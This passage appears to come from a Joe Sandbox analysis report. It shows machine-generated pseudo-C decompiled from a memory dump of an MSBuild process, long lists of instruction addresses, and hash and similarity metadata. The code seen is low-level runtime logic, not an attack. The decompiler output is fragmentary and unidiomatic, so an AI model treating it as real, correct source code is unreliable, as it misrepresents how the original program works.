																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}








































































































                                                                                                0x010bd5f2
                                                                                                0x010bd5f5
                                                                                                0x010bd5f5
                                                                                                0x010bd5fd
                                                                                                0x010bd600
                                                                                                0x010bd60a
                                                                                                0x010bd60d
                                                                                                0x010bd617
                                                                                                0x010bd61d
                                                                                                0x010bd627
                                                                                                0x010bd62e
                                                                                                0x010bd911
                                                                                                0x010bd913
                                                                                                0x00000000
                                                                                                0x010bd919
                                                                                                0x010bd919
                                                                                                0x010bd919
                                                                                                0x010bd634
                                                                                                0x010bd634
                                                                                                0x010bd634
                                                                                                0x010bd634
                                                                                                0x010bd640
                                                                                                0x010bd8bf
                                                                                                0x00000000
                                                                                                0x010bd646
                                                                                                0x010bd646
                                                                                                0x010bd64d
                                                                                                0x010bd652
                                                                                                0x0110b2fc
                                                                                                0x0110b2fc
                                                                                                0x0110b302
                                                                                                0x0110b33b
                                                                                                0x0110b341
                                                                                                0x00000000
                                                                                                0x0110b304
                                                                                                0x0110b304
                                                                                                0x0110b319
                                                                                                0x0110b31e
                                                                                                0x0110b324
                                                                                                0x0110b326
                                                                                                0x0110b332
                                                                                                0x0110b347
                                                                                                0x0110b34c
                                                                                                0x0110b351
                                                                                                0x0110b35a
                                                                                                0x00000000
                                                                                                0x0110b328
                                                                                                0x0110b328
                                                                                                0x00000000
                                                                                                0x0110b328
                                                                                                0x0110b326
                                                                                                0x010bd658
                                                                                                0x010bd658
                                                                                                0x010bd65b
                                                                                                0x010bd665
                                                                                                0x00000000
                                                                                                0x010bd66b
                                                                                                0x010bd66b
                                                                                                0x010bd66b
                                                                                                0x010bd66b
                                                                                                0x010bd66d
                                                                                                0x010bd672
                                                                                                0x010bd67a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010bd680
                                                                                                0x010bd686
                                                                                                0x010bd8ce
                                                                                                0x010bd8d4
                                                                                                0x010bd8dd
                                                                                                0x010bd8e0
                                                                                                0x010bd68c
                                                                                                0x010bd691
                                                                                                0x010bd69d
                                                                                                0x010bd6a2
                                                                                                0x010bd6a7
                                                                                                0x010bd6b0
                                                                                                0x010bd6b5
                                                                                                0x010bd6e0
                                                                                                0x010bd6b7
                                                                                                0x010bd6b7
                                                                                                0x010bd6b9
                                                                                                0x010bd6b9
                                                                                                0x010bd6bb
                                                                                                0x010bd6bd
                                                                                                0x010bd6ce
                                                                                                0x010bd6d0
                                                                                                0x010bd6d2
                                                                                                0x0110b363
                                                                                                0x0110b365
                                                                                                0x00000000
                                                                                                0x0110b36b
                                                                                                0x00000000
                                                                                                0x0110b36b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010bd6bf
                                                                                                0x010bd6bf
                                                                                                0x010bd6e5
                                                                                                0x010bd6e7
                                                                                                0x010bd6e9
                                                                                                0x010bd6ec
                                                                                                0x010bd6ec
                                                                                                0x010bd6ef
                                                                                                0x010bd6f5
                                                                                                0x010bd6f9
                                                                                                0x010bd6fb
                                                                                                0x010bd6fd
                                                                                                0x010bd701
                                                                                                0x010bd703
                                                                                                0x010bd70a
                                                                                                0x010bd70a
                                                                                                0x010bd701
                                                                                                0x010bd710
                                                                                                0x010bd710
                                                                                                0x010bd6c1
                                                                                                0x010bd6c1
                                                                                                0x010bd6c6
                                                                                                0x0110b36d
                                                                                                0x0110b36f
                                                                                                0x00000000
                                                                                                0x0110b375
                                                                                                0x0110b375
                                                                                                0x0110b375
                                                                                                0x00000000
                                                                                                0x0110b375
                                                                                                0x00000000
                                                                                                0x010bd6cc
                                                                                                0x010bd6d8
                                                                                                0x010bd6d8
                                                                                                0x010bd6d8
                                                                                                0x00000000
                                                                                                0x010bd6c6
                                                                                                0x010bd6bf
                                                                                                0x00000000
                                                                                                0x010bd6da
                                                                                                0x010bd6da
                                                                                                0x010bd716
                                                                                                0x010bd71b
                                                                                                0x010bd720
                                                                                                0x010bd726
                                                                                                0x010bd726
                                                                                                0x010bd72d
                                                                                                0x00000000
                                                                                                0x010bd733
                                                                                                0x010bd739
                                                                                                0x010bd742
                                                                                                0x010bd750
                                                                                                0x010bd758
                                                                                                0x010bd764
                                                                                                0x010bd776
                                                                                                0x010bd77a
                                                                                                0x010bd783
                                                                                                0x010bd928
                                                                                                0x010bd92c
                                                                                                0x010bd93d
                                                                                                0x010bd944
                                                                                                0x010bd94f
                                                                                                0x010bd954
                                                                                                0x010bd956
                                                                                                0x010bd95f
                                                                                                0x010bd961
                                                                                                0x010bd973
                                                                                                0x010bd973
                                                                                                0x010bd956
                                                                                                0x010bd944
                                                                                                0x010bd92c
                                                                                                0x010bd78b
                                                                                                0x0110b394
                                                                                                0x010bd791
                                                                                                0x010bd798
                                                                                                0x0110b3a3
                                                                                                0x0110b3bb
                                                                                                0x0110b3bb
                                                                                                0x010bd7a5
                                                                                                0x010bd866
                                                                                                0x010bd870
                                                                                                0x010bd884
                                                                                                0x010bd892
                                                                                                0x010bd898
                                                                                                0x010bd89e
                                                                                                0x010bd8a0
                                                                                                0x010bd8a6
                                                                                                0x010bd8ac
                                                                                                0x010bd8ae
                                                                                                0x010bd8b4
                                                                                                0x010bd8b4
                                                                                                0x010bd8ae
                                                                                                0x010bd7a5
                                                                                                0x010bd78b
                                                                                                0x010bd7b1
                                                                                                0x0110b3c5
                                                                                                0x0110b3c5
                                                                                                0x010bd7c3
                                                                                                0x010bd7ca
                                                                                                0x010bd7e5
                                                                                                0x010bd7eb
                                                                                                0x010bd8eb
                                                                                                0x010bd8ed
                                                                                                0x00000000
                                                                                                0x010bd8f3
                                                                                                0x010bd8f3
                                                                                                0x010bd8f3
                                                                                                0x00000000
                                                                                                0x010bd8ed
                                                                                                0x010bd7cc
                                                                                                0x010bd7cc
                                                                                                0x010bd7d2
                                                                                                0x00000000
                                                                                                0x010bd7d4
                                                                                                0x010bd7d4
                                                                                                0x010bd7d7
                                                                                                0x010bd7df
                                                                                                0x0110b3d4
                                                                                                0x0110b3d9
                                                                                                0x0110b3dc
                                                                                                0x0110b3dc
                                                                                                0x0110b3df
                                                                                                0x0110b3e2
                                                                                                0x0110b468
                                                                                                0x0110b46d
                                                                                                0x0110b46f
                                                                                                0x0110b46f
                                                                                                0x0110b475
                                                                                                0x010bd8f8
                                                                                                0x010bd8f9
                                                                                                0x010bd8fd
                                                                                                0x0110b3e8
                                                                                                0x0110b3e8
                                                                                                0x0110b3eb
                                                                                                0x0110b3ed
                                                                                                0x00000000
                                                                                                0x0110b3ef
                                                                                                0x0110b3ef
                                                                                                0x0110b3f1
                                                                                                0x0110b3f4
                                                                                                0x0110b3fe
                                                                                                0x0110b404
                                                                                                0x0110b409
                                                                                                0x0110b40e
                                                                                                0x0110b410
                                                                                                0x0110b410
                                                                                                0x0110b414
                                                                                                0x0110b414
                                                                                                0x0110b41b
                                                                                                0x0110b420
                                                                                                0x0110b423
                                                                                                0x0110b425
                                                                                                0x0110b427
                                                                                                0x0110b42a
                                                                                                0x0110b42d
                                                                                                0x0110b42d
                                                                                                0x0110b42a
                                                                                                0x0110b432
                                                                                                0x0110b436
                                                                                                0x0110b438
                                                                                                0x0110b43b
                                                                                                0x0110b43b
                                                                                                0x0110b449
                                                                                                0x0110b44e
                                                                                                0x0110b454
                                                                                                0x0110b458
                                                                                                0x0110b458
                                                                                                0x0110b45d
                                                                                                0x00000000
                                                                                                0x0110b45d
                                                                                                0x0110b3ed
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010bd7df
                                                                                                0x010bd7d2
                                                                                                0x010bd7ca
                                                                                                0x0110b37c
                                                                                                0x0110b37e
                                                                                                0x0110b385
                                                                                                0x0110b38a
                                                                                                0x00000000
                                                                                                0x0110b38a
                                                                                                0x010bd742
                                                                                                0x010bd7f1
                                                                                                0x010bd7f8
                                                                                                0x0110b49b
                                                                                                0x0110b49b
                                                                                                0x010bd800
                                                                                                0x010bd837
                                                                                                0x010bd843
                                                                                                0x010bd845
                                                                                                0x010bd847
                                                                                                0x010bd84a
                                                                                                0x010bd84b
                                                                                                0x010bd84e
                                                                                                0x010bd857
                                                                                                0x010bd802
                                                                                                0x010bd802
                                                                                                0x010bd80d
                                                                                                0x00000000
                                                                                                0x010bd818
                                                                                                0x010bd818
                                                                                                0x010bd824
                                                                                                0x010bd831
                                                                                                0x0110b4a5
                                                                                                0x0110b4ab
                                                                                                0x0110b4b3
                                                                                                0x0110b4b8
                                                                                                0x0110b4bb
                                                                                                0x00000000
                                                                                                0x0110b4c1
                                                                                                0x0110b4c1
                                                                                                0x0110b4c8
                                                                                                0x00000000
                                                                                                0x0110b4ce
                                                                                                0x0110b4d4
                                                                                                0x0110b4e1
                                                                                                0x0110b4e3
                                                                                                0x0110b4e5
                                                                                                0x00000000
                                                                                                0x0110b4eb
                                                                                                0x0110b4f0
                                                                                                0x0110b4f2
                                                                                                0x010bdac9
                                                                                                0x010bdacc
                                                                                                0x010bdacf
                                                                                                0x010bdad1
                                                                                                0x010bdd78
                                                                                                0x010bdd78
                                                                                                0x010bdcf2
                                                                                                0x00000000
                                                                                                0x010bdad7
                                                                                                0x010bdad9
                                                                                                0x010bdadb
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010bdae1
                                                                                                0x010bdae1
                                                                                                0x010bdae4
                                                                                                0x010bdae6
                                                                                                0x0110b4f9
                                                                                                0x0110b4f9
                                                                                                0x0110b500
                                                                                                0x010bdaec
                                                                                                0x010bdaec
                                                                                                0x010bdaf5
                                                                                                0x010bdaf8
                                                                                                0x010bdafb
                                                                                                0x010bdb03
                                                                                                0x010bdb11
                                                                                                0x010bdb16
                                                                                                0x010bdb19
                                                                                                0x010bdb1b
                                                                                                0x0110b52c
                                                                                                0x0110b531
                                                                                                0x0110b534
                                                                                                0x010bdb21
                                                                                                0x010bdb21
                                                                                                0x010bdb24
                                                                                                0x010bdcd9
                                                                                                0x010bdce2
                                                                                                0x010bdce5
                                                                                                0x010bdd6a
                                                                                                0x010bdd6d
                                                                                                0x00000000
                                                                                                0x010bdd73
                                                                                                0x0110b51a
                                                                                                0x0110b51c
                                                                                                0x0110b51f
                                                                                                0x0110b524
                                                                                                0x00000000
                                                                                                0x0110b524
                                                                                                0x010bdce7
                                                                                                0x010bdce7
                                                                                                0x010bdce7
                                                                                                0x00000000
                                                                                                0x010bdce7
                                                                                                0x00000000
                                                                                                0x010bdb2a
                                                                                                0x010bdb2c
                                                                                                0x010bdb31
                                                                                                0x010bdb33
                                                                                                0x010bdb36
                                                                                                0x010bdb39
                                                                                                0x010bdb3b
                                                                                                0x010bdb66
                                                                                                0x010bdb66
                                                                                                0x010bdb3d
                                                                                                0x010bdb3d
                                                                                                0x010bdb3e
                                                                                                0x010bdb46
                                                                                                0x010bdb47
                                                                                                0x010bdb49
                                                                                                0x010bdb4c
                                                                                                0x010bdb53
                                                                                                0x010bdb55
                                                                                                0x010bdb58
                                                                                                0x010bdb5a
                                                                                                0x0110b50a
                                                                                                0x0110b50f
                                                                                                0x0110b512
                                                                                                0x010bdb60
                                                                                                0x010bdb60
                                                                                                0x010bdb63
                                                                                                0x010bdb63
                                                                                                0x00000000
                                                                                                0x010bdb63
                                                                                                0x010bdb5a
                                                                                                0x010bdb3b
                                                                                                0x010bdb24
                                                                                                0x010bdb69
                                                                                                0x010bdb69
                                                                                                0x010bdb6c
                                                                                                0x010bdb6f
                                                                                                0x010bdb74
                                                                                                0x0110b557
                                                                                                0x0110b557
                                                                                                0x0110b55e
                                                                                                0x010bdb7a
                                                                                                0x010bdb7c
                                                                                                0x010bdb7f
                                                                                                0x010bdb82
                                                                                                0x010bdb85
                                                                                                0x00000000
                                                                                                0x010bdb8b
                                                                                                0x010bdb8b
                                                                                                0x010bdb8d
                                                                                                0x010bdb9b
                                                                                                0x010bdb9b
                                                                                                0x010bdb9d
                                                                                                0x010bdba0
                                                                                                0x010bdba2
                                                                                                0x010bdba4
                                                                                                0x010bdba7
                                                                                                0x010bdba9
                                                                                                0x010bdbae
                                                                                                0x010bdbae
                                                                                                0x010bdbb1
                                                                                                0x010bdbb4
                                                                                                0x010bdbb4
                                                                                                0x010bdbb7
                                                                                                0x010bdbba
                                                                                                0x010bdcd2
                                                                                                0x010bdcd4
                                                                                                0x00000000
                                                                                                0x010bdbc0
                                                                                                0x010bdbc0
                                                                                                0x010bdbd2
                                                                                                0x010bdbd7
                                                                                                0x010bdbda
                                                                                                0x010bdbdd
                                                                                                0x010bdbdf
                                                                                                0x00000000
                                                                                                0x010bdbe5
                                                                                                0x010bdbe5
                                                                                                0x010bdbee
                                                                                                0x010bdbf1
                                                                                                0x0110b541
                                                                                                0x0110b544
                                                                                                0x00000000
                                                                                                0x0110b546
                                                                                                0x0110b546
                                                                                                0x00000000
                                                                                                0x0110b546
                                                                                                0x010bdbf7
                                                                                                0x010bdbf7
                                                                                                0x010bdbfd
                                                                                                0x010bdbfd
                                                                                                0x010bdbff
                                                                                                0x010bdc0b
                                                                                                0x010bdc15
                                                                                                0x010bdc1b
                                                                                                0x010bdc1d
                                                                                                0x010bdc21
                                                                                                0x010bdc21
                                                                                                0x010bdc23
                                                                                                0x010bdc23
                                                                                                0x010bdc26
                                                                                                0x010bdc29
                                                                                                0x010bdc2b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010bdc31
                                                                                                0x010bdc34
                                                                                                0x010bdc36
                                                                                                0x010bdcbf
                                                                                                0x010bdcbf
                                                                                                0x010bdcc2
                                                                                                0x00000000
                                                                                                0x010bdc3c
                                                                                                0x010bdc41
                                                                                                0x010bdc43
                                                                                                0x00000000
                                                                                                0x010bdc45
                                                                                                0x010bdc45
                                                                                                0x010bdc47
                                                                                                0x00000000
                                                                                                0x010bdc4d
                                                                                                0x010bdc4d
                                                                                                0x010bdc50
                                                                                                0x010bdc52
                                                                                                0x010bdc55
                                                                                                0x010bdcfa
                                                                                                0x010bdcfe
                                                                                                0x010bdd08
                                                                                                0x010bdd0a
                                                                                                0x010bdd0c
                                                                                                0x00000000
                                                                                                0x010bdd12
                                                                                                0x010bdd15
                                                                                                0x010bdd2d
                                                                                                0x010bdd2f
                                                                                                0x010bdd32
                                                                                                0x010bdd35
                                                                                                0x00000000
                                                                                                0x010bdd35
                                                                                                0x010bdc5b
                                                                                                0x010bdc5b
                                                                                                0x010bdc5e
                                                                                                0x010bdc61
                                                                                                0x010bdc64
                                                                                                0x010bdc67
                                                                                                0x010bdc67
                                                                                                0x010bdc6a
                                                                                                0x010bdc6c
                                                                                                0x010bdc8e
                                                                                                0x010bdc8e
                                                                                                0x010bdc91
                                                                                                0x010bdc93
                                                                                                0x010bdcce
                                                                                                0x010bdcce
                                                                                                0x010bdc95
                                                                                                0x010bdc9c
                                                                                                0x010bdc6e
                                                                                                0x010bdc72
                                                                                                0x010bdc75
                                                                                                0x010bdc77
                                                                                                0x010bdc79
                                                                                                0x0110b551
                                                                                                0x0110b551
                                                                                                0x00000000
                                                                                                0x010bdc7f
                                                                                                0x010bdc7f
                                                                                                0x010bdc81
                                                                                                0x00000000
                                                                                                0x010bdc83
                                                                                                0x010bdc86
                                                                                                0x010bdc88
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010bdc88
                                                                                                0x010bdc81
                                                                                                0x010bdc79
                                                                                                0x010bdc6c
                                                                                                0x010bdc55
                                                                                                0x010bdc47
                                                                                                0x010bdc43
                                                                                                0x00000000
                                                                                                0x010bdc36
                                                                                                0x010bdc23
                                                                                                0x00000000
                                                                                                0x010bdbff
                                                                                                0x010bdbf1
                                                                                                0x010bdbdf
                                                                                                0x010bdb8f
                                                                                                0x010bdb92
                                                                                                0x010bdb95
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010bdb95
                                                                                                0x010bdb8d
                                                                                                0x010bdb85
                                                                                                0x010bdb74
                                                                                                0x010bdc9f
                                                                                                0x010bdca2
                                                                                                0x010bdcb0
                                                                                                0x010bdcb0
                                                                                                0x010bdad1
                                                                                                0x0110b4e5
                                                                                                0x0110b4c8
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010bd831
                                                                                                0x010bd80d
                                                                                                0x00000000
                                                                                                0x010bd800
                                                                                                0x0110b47f
                                                                                                0x0110b485
                                                                                                0x00000000
                                                                                                0x0110b485
                                                                                                0x010bd665
                                                                                                0x010bd652
                                                                                                0x00000000

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID: DebugPrintTimes
                                                                                                • String ID:
                                                                                                • API String ID: 3446177414-0
                                                                                                • Opcode ID: 26c523e398fccae7f9eea675472c758a8ce356ff840e8e0dbb16921209c6087c
                                                                                                • Instruction ID: 170d27e147a6800d69e04e2a514dfeab0d32efcce9847ff23974d872374f7d7d
                                                                                                • Opcode Fuzzy Hash: 26c523e398fccae7f9eea675472c758a8ce356ff840e8e0dbb16921209c6087c
                                                                                                • Instruction Fuzzy Hash: E8E1CF34A0435A8FEB29CF58C984BE9BBB2BF45308F0501E9D9999B291D770A981CF51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010D513A Relevance: 1.8, APIs: 1, Instructions: 258timeCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 67%
                                                                                                			E010D513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x119d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E010ED0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E010C2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L010C4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E010EF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E010BFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x119b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E010EB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                                                                                0x010d5142
                                                                                                0x010d514c
                                                                                                0x010d5150
                                                                                                0x010d5157
                                                                                                0x010d5159
                                                                                                0x010d515e
                                                                                                0x010d5165
                                                                                                0x010d5169
                                                                                                0x010d516c
                                                                                                0x010d5172
                                                                                                0x010d5176
                                                                                                0x010d517a
                                                                                                0x010d517a
                                                                                                0x010d517a
                                                                                                0x010d517f
                                                                                                0x01116d8b
                                                                                                0x01116d8e
                                                                                                0x01116d91
                                                                                                0x01116d95
                                                                                                0x01116d98
                                                                                                0x01116d9c
                                                                                                0x01116da0
                                                                                                0x01116da3
                                                                                                0x01116da7
                                                                                                0x01116e26
                                                                                                0x01116e26
                                                                                                0x01116e2a
                                                                                                0x010d51f9
                                                                                                0x010d51f9
                                                                                                0x010d51fe
                                                                                                0x01116e33
                                                                                                0x01116e33
                                                                                                0x01116e39
                                                                                                0x01116e3d
                                                                                                0x01116e46
                                                                                                0x01116e50
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01116e52
                                                                                                0x01116e53
                                                                                                0x01116e56
                                                                                                0x01116e5d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01116e5f
                                                                                                0x01116e67
                                                                                                0x01116e77
                                                                                                0x01116e7f
                                                                                                0x01116e80
                                                                                                0x01116e88
                                                                                                0x01116e90
                                                                                                0x01116e9f
                                                                                                0x01116ea5
                                                                                                0x01116ea9
                                                                                                0x01116eb1
                                                                                                0x01116ebf
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01116ecf
                                                                                                0x01116ed3
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01116edb
                                                                                                0x01116ede
                                                                                                0x01116ee1
                                                                                                0x01116ee8
                                                                                                0x01116eeb
                                                                                                0x01116eed
                                                                                                0x01116ef0
                                                                                                0x01116ef4
                                                                                                0x01116ef8
                                                                                                0x01116efc
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01116f0d
                                                                                                0x01116f11
                                                                                                0x01116f32
                                                                                                0x01116f37
                                                                                                0x01116f3b
                                                                                                0x01116f3e
                                                                                                0x01116f41
                                                                                                0x01116f46
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01116f4c
                                                                                                0x01116f50
                                                                                                0x01116f50
                                                                                                0x01116f54
                                                                                                0x01116f62
                                                                                                0x01116f65
                                                                                                0x01116f6d
                                                                                                0x01116f7b
                                                                                                0x01116f7b
                                                                                                0x01116f93
                                                                                                0x01116f98
                                                                                                0x01116fa0
                                                                                                0x01116fa6
                                                                                                0x01116fb3
                                                                                                0x01116fb6
                                                                                                0x01116fbf
                                                                                                0x01116fc1
                                                                                                0x01116fd5
                                                                                                0x01116fda
                                                                                                0x01116fda
                                                                                                0x01116fdd
                                                                                                0x01116fe2
                                                                                                0x01116fe7
                                                                                                0x01116feb
                                                                                                0x01116fef
                                                                                                0x01116ff3
                                                                                                0x010d520c
                                                                                                0x010d520c
                                                                                                0x010d520f
                                                                                                0x010d5215
                                                                                                0x010d5234
                                                                                                0x010d523a
                                                                                                0x010d523a
                                                                                                0x010d5244
                                                                                                0x010d5245
                                                                                                0x010d5246
                                                                                                0x010d5251
                                                                                                0x010d5251
